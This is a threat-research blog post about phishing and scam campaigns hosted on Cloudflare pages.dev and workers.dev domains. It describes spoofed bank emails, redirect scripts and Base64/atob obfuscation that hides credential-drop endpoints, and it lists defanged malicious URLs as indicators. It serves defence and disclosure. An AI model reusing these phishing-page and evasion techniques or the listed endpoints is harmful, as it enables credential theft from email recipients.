It’s Raining Phish and Scams – How Cloudflare Pages.dev and Workers.dev Domains Get Abused

As they say, when it rains, it pours. Recently, we observed more than 3,000 phishing emails containing phishing URLs abusing services at workers.dev and pages.dev domains.

What is .dev Top Level Domain (TLD)?

The .dev  top-level domain name is operated by Google. It is incorporated on the HTTP Strict Transport Security (HSTS) preload list, requiring HTTPS on all .dev domains without individual HSTS enlistment.

Cloudflare Pages vs Workers

Both pages.dev and workers.dev domains are part of Cloudflare’s web development and hosting services. Even though both of these domains offer web development services under Cloudflare, there’s some significant differences between them.

In Cloudflare Pages, the developers can deploy their project by connecting to a Git provider, while in Cloudflare Workers, it provides a serverless execution environment. With workers.dev, you can build your page and deploy it using your local resources.

Comparing the two Cloudflare services, despite the free trial offered in workers.dev it seems pages.dev is the most abused domain, probably because of the convenience and benefit of using a Git provider like GitHub in web development.

Abused Cloudflare Domains in Phishing Emails

As mentioned earlier, we observed a lot of phishing emails containing URLs using the domains pages.dev or workers.dev. Most of the phishing emails mimicking different companies using different alarming subjects related to payment details, voicemails, pending inquiries, etc. Some of the URLs in these emails used *.pages.dev as redirection, and some are the actual phishing page.

Phishing email mimicking financial services company:

Figure 1. The email header containing spoofed rom address pretending to be from Westpac

Figure 1.1 Email body containing details about the payment made though Westpac

The email body also contains a phishing URL link that uses the pages.dev domain and contains the recipient’s email in the URL path.

Figure 2. Screenshot of the actual phishing URL hxxp://a211a49a8bb35[.]pages[.]dev/?email={email address}

Phishing email with URL redirection:

Figure 3. The email header contains malicious mailer[.]php in X-PHP-Script

The mailer script sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php was used to compose and send the phishing email to the recipient.

Figure 3.1 Screenshot of sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php

However, the domain sondakikatokathaberleri[.]name[.]tr seems to be a WordPress site still under construction.

Figure 3.2 Screenshot of sondakikatokathaberleri[.]name[.]tr

Figure 4. The email body that requires recipient for account update

The email body contains a clickable link that contains the original URL hxxps://3f303073[.]45564355zezdfxc56e667[.]pages.dev/qrdcxw52463f86302yh72-fe4367z and it contains JavaScript hosted on a pages.dev site that redirects to hxxps://helpsana[.]ro/wp-hash/1/index4[.]php which is the actual phishing page.

Figure 4.1 Screenshot of the source code of the URL containing phishing redirection

Figure 4.2 Screenshot of the phishing URL hxxps://helpsana[.]ro/wp-hash/1/index4[.]php

Other Phishing URLs with Cloudflare Pages and Workers

A phishing URL using pages.dev was also seen targeting Microsoft. The source code contains an atob function and uses a variable containing the Base64 string. The atob function decodes a string which has been encoded in Base64 encoding.

Figure 5. Screenshot of the actual phishing URL hxxps://1-d0asfasfjhasfa7979352jhasf.pages[.]dev/

However, when the Base64 string was decoded, it contained the URL hxxps://tutu57tututut[.]000webhostapp[.]com/don[.]php where the stolen credentials will be stored.

Figure 5.1 Screenshot of the source code with usage of variable ‘olafatob’

Below is another sample of a phishing URL that uses the workers.dev domain targeting Dropbox. The page uses a similar decoding or obfuscation technique using the atob function.

Figure 6. Screenshot of Phishing URL

hxxps://ancient-salad-4674.mmrctliacetgliue504[.]workers[.]dev/87c03eda-fdd4-4125-bf73-1b161178699a 

Figure 7. Screenshot of the encoded source code and usage of atob function

Cloudflare Pages and Workers in VirusTotal

On the other hand, over a 90-day period we observed in VirusTotal that there were at least 60,000 URLs containing the workers.dev domain, and the majority were being used in phishing activity.

Figure 8. Screenshot of a sample of URLs queried in VirusTotal with workers.dev

Meanwhile, at least 65,000 pages.dev URLs were also seen for the past 90 days. More than 11,000 URLs were related to scam or fake news, and they are being blocked only by Trustwave:

Figure 9. Screenshot of the URLs query in VirusTotal

Figure 10. Screenshot of the fake news site

These scam URLs use keywords like cash, money, job, etc. on the domain name followed by 1-3 digits and often contain URL links that redirect to another scam site.

Figure 11. Screenshot of the sample redirection to another scam URL

As of this writing, some of the scam or phishing URLs have already been taken down by Cloudflare due to malicious activity.

Conclusion

We are seeing a huge number of phishing and scam pages abusing these .dev Cloudflare services. Some phishers abused the free web services in a large-scale way. We need to be very wary of pages.dev and workers.dev links that we see in email. Most of the phishing or even scam pages we’re seeing use redirection or encoded strings in page content to avoid getting easily detected by AV products. However, Trustwave MailMarshal has protections for these campaigns.

Staying vigilant and updated on the latest threats is the most powerful key to avoid becoming a victim of such phishing or scams.

IOCs

URLs

Some Samples of Scam or Fake News URLs with a Common Domain Format

References

https://en.wikipedia.org/wiki/.dev

https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security

https://get.dev/#get-started

https://developers.cloudflare.com/pages/

https://developers.cloudflare.com/workers/